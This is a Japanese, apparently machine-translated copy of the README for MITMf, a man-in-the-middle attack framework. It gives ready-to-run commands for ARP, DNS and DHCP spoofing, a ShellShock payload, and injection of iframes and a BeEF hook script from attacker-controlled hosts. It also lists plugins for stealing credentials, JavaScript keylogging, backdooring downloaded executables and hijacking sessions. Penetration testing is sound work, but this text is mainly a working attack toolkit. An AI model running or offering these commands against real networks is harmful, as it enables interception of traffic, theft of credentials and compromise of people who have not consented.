Github: https://github.com/byt3bl33d3r/MITMf
MITMf
Man-In-The-Middle攻撃のフレームワーク
クイックチュートリアル、サンプル、および開発者の更新情報: https : //byt3bl33d3r.github.io
このツールは、 sergio-proxyに基づいており、プロジェクトを復活させて更新する試みです。
私に連絡する:
- Twitter:@ byt3bl33d3r
- Freenode上のIRC:#MITMf
- メールアドレス : byt3bl33d3r@protonmail.com
問題を提出する前に、wikiの該当するセクションをお読みください。
インストール
インストール手順についてはwikiを参照してください
説明
MITMfは、Man-In-The-Middleとネットワーク攻撃のワンストップショップを提供し、既存の攻撃や技術を更新し改善することを目指しています。
もともとは、他のツール(Ettercap、Malloryなど)の重大な欠点に対処するために作られたもので、誰もが独自のMITM攻撃を実装するために使用できるモジュラーで容易に拡張可能なフレームワークを提供するために、
特徴
-
このフレームワークには、さまざまなプラグインによって制御および使用できるビルトインのSMB、HTTP、およびDNSサーバーが含まれています。また、HTTP変更と部分的なHSTSバイパスを可能にするSSLStripプロキシの修正バージョンが含まれています。
-
バージョン0.9.8以降、MITMfはアクティブなパケットのフィルタリングと操作(基本的にはエターフィルタのほうが優れています)をサポートしており、ユーザーはあらゆる種類のトラフィックやプロトコルを変更できます。
-
MITMfの実行中に設定ファイルをオンザフライで編集することができます。変更はフレームワークを通して伝えられます。これにより、攻撃を実行しながらプラグインとサーバの設定を微調整することができます。
-
MITMfは、 Net-Credsを使用してFTP、IRC、POP、IMAP、Telnet、SMTP、SNMP(コミュニティ文字列)、NTLMv1 / v2(HTTP、SMB、LDAPなどのサポートされるすべてのプロトコル)およびKerberos資格情報を取得します起動。
-
レスポンダの統合により、LLMNR、NBT-NS、MDNSポイズニング、WPAD不正サーバがサポートされます。
アクティブなパケットのフィルタリング/修正
Scapy!を使用してMITMfによって傍受されるパケット/プロトコルを変更できるようになりました。 (これ以上のエターフィルタはありません!)
たとえば、ICMPパケットの宛先IPアドレスを変更するばかりの小さなフィルタがあります:
if packet.haslayer(ICMP):
log.info('Got an ICMP packet!')
packet.dst = '192.168.1.0'
-
packet
変数を使用して、Scapy互換フォーマットのパケットにアクセスします。 -
data
変数を使用して生のパケットデータにアクセスする
今私たちがする必要があるフィルタを使用するには: python mitmf.py -F ~/filter.py
他の誰かからのパケットを実際に傍受するために、これをSpoofプラグインと組み合わせたいと思うかもしれません;)
注 :MITMfを再起動することなく、オンザフライでフィルタを変更することができます!
例
最も基本的な使い方は、インタフェースenp3s0上でHTTPプロキシSMB、DNS、HTTPサーバ、Net-Credを起動します。
python mitmf.py -i enp3s0
ARPは、 スプーフィングプラグインを使用して、サブネット全体を192.168.1.1のゲートウェイで保護します。
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
上記と同じ+ レスポンダプラグインを使用するWPAD不正なプロキシサーバ:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
ARPポイズン192.168.1.16-45および192.168.0.1/24(192.168.1.1のゲートウェイ)
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
ARPポイズニング中にDNSスプーフィングを有効にします(スプーフィングするドメインは設定ファイルから取得されます)。
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
LLMNR / NBTNS / MDNSのなりすましを有効にする:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
DHCPスプーフィングを有効にします(IPプールとサブネットは設定ファイルから取得されます)。
python mitmf.py -i enp3s0 --spoof --dhcp
任意のクライアントが脆弱である場合に実行されるShellShockペイロードと同じです:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Injectプラグインを使用してHTMLのIFrameを挿入する:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
JSスクリプトを挿入する:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
すべてをhttp:// SERVER / PATHにリダイレクトするキャプティブポータルを開始します。
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH
config / captiveフォルダからデフォルトのページ/portal.html(thxレスポンダ)と/CaptiveClient.exe(含まれていない)を使用して、 http://your-ip/portal.htmlのキャプティブポータルを開始します。
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive
上記と同じですが、IPの代わりにホスト名captive.portalを使用します(たとえば、DNSスプーフィングを使用してIPに解決するにはcaptive.portalが必要です)。
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns
http:// IP:8080 (mitmf.configのポートを変更)で、LOCALDIRに対応する追加のSimpleHTTPServerインスタンスを含むキャプティブポータルを提供します。
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR
上記と同じですがホスト名は同じです:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns
さらにはるかに!
もちろん、ほとんどすべてのプラグインを組み合わせて組み合わせることができます(ARPスプーフィング+インジェクション+レスポンダーなど)。
利用可能なオプションの完全な一覧は、 python mitmf.py --help
実行するだけです。
現在利用可能なプラグイン
- HTA Drive-By :偽のアップデート通知を送り、クライアントにHTAアプリケーションをダウンロードするように促す
- SMBTrap :接続されたクライアントの「SMBトラップ」脆弱性を利用する
- ScreenShotter :HTML5 Canvasを使用してクライアントブラウザの正確なスクリーンショットをレンダリングする
- レスポンダ :LLMNR、NBT-NS、WPAD、MDNSポイズンジャー
- SSLstrip + :部分的にバイパスするHSTS
- Spoof :ARP、ICMP、DHCP、またはDNSのなりすましを使用してトラフィックをリダイレクトする
- BeEFAutorun :クライアントのOSまたはブラウザの種類に基づいてBeEFモジュールを自動実行する
- AppCachePoison :HTML5 App-Cache中毒攻撃を実行する
- Ferret-NG :クライアントセッションを透過的に乗っ取る
- BrowserProfiler :接続されたクライアントのすべてのブラウザプラグインを列挙しようとします。
- FilePwn :バックドアファクトリとBDFProxyを使用してHTTP経由で送信されたバックドア実行ファイル
- 注入 :任意のコンテンツをHTMLコンテンツに挿入する
- BrowserSniper :古いブラウザプラグインを使用しているクライアントに対してドライブバイ攻撃を実行する
- JSkeylogger :JavaScriptのキーロガーをクライアントのWebページに挿入する
- 置き換え :HTMLコンテンツの任意のコンテンツを置き換える
- SMBAuth :SMBチャレンジ/レスポンス認証の試みを呼び起こす
- Upsidedownternet :画像を180度反転する
- キャプティブ :キャプティブポータルを作成し、302を使用してHTTPリクエストをリダイレクトします。
紅茶&寿司の準備資金の資金調達方法
BTC:1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH:0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC:LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr